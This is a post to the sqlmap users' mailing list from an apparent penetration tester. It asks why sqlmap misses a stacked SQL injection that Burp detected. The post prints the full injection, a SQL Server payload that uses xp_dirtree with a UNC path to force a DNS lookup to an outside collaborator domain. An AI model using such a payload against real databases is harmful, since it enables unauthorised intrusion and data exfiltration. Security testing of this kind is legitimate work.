I have a situation where Burp has detected the following DNS exfiltration
injection for a query parameter in a web app:
GET
/XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20
HTTP/1.1
To make that a little easier to read, the injected value is:
';declare @q varchar(99);set
@q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec
master.dbo.xp_dirtree @q;--
I've modified the domain and verified that I receive the DNS requests on my
local DNS server (the domain which I provide to sqlmap using the
--dns-domain=xxx option) when the injection is manually sent to the page. The
problem is, when I pass the request to sqlmap it's not detecting that there's
an injection at all. I've provided the OS/DBMS and --level 5, but still no
dice. I'm using sqlmap v1.0.12#stable.
Since I've gotten many other injections to work in the past, I believe that I'm
using sqlmap properly (formatting my request in a file appropriately,
specifying the correct parameter to test, etc.) However, it surprised me that
what appeared to be a fairly straight-forward stacked SQL injection would slip
by all of sqlmap's tests. Is there a way to force sqlmap to try DNS
exfiltration injections despite no other injection technique succeeding?
Thanks
V
------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
